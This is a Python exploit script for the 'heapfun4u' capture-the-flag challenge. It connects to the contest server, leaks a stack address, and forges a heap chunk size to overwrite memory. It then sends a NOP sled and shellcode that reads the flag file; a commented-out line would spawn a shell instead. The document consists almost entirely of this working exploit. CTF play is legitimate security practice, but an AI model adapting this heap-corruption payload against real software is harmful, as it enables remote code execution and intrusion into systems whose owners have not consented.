import phun import struct r = phun.Remote('heapfun4u_873c6d81dd688c9057d5b229cf80579e.quals.shallweplayaga.me',3957) #r=phun.Remote('localhost',1234) r.read('|') r.sendline('A');r.read(':');r.sendline(str(512)) r.read('|') r.sendline('F');r.read(':');r.sendline('1') r.read('|') r.sendline('A');r.read(':');r.sendline(str(8));r.read('|') r.sendline('A');r.read(':');r.sendline(str(16));r.read('|') r.sendline('N');y=r.read("\n");r.read('|') stack=int(y.strip().split(' ')[-1],16) r.sendline('W');x=r.read(':') #print x,hex(stack) addr=int(x.split('\n')[-2].split(' ')[1],16) xaddr = (0x10000000000000000 - (addr)) + (stack-4+0x200) xaddr &= 0xffffffffffffffff xaddr |= 1 xaddr |= 2 xaddr2 = (0x10000000000000000 - (addr)) + (0x602028) xaddr2 &= 0xffffffffffffffff #xaddr = 10#0x100 - ((addr - 8)&0xff) payload = 'A'*16 + struct.pack('Q',xaddr) + "\xeb\x1e"+"\xcc"*14 + struct.pack('Q',xaddr2) payload += "\x90"*30 + phun.readfile('./flag',arch='x64')[1] #phun.shell('x64') payload = payload.ljust(512,'\x00') #raw_input('x') #print hex(xaddr),`payload` r.sendline('1');r.read(':') r.write(payload) r.read('|') r.sendline('F');r.read(':');r.sendline('3') print r.read('|') r.write('1') import telnetlib t = telnetlib.Telnet() t.sock = r.sock t.interact()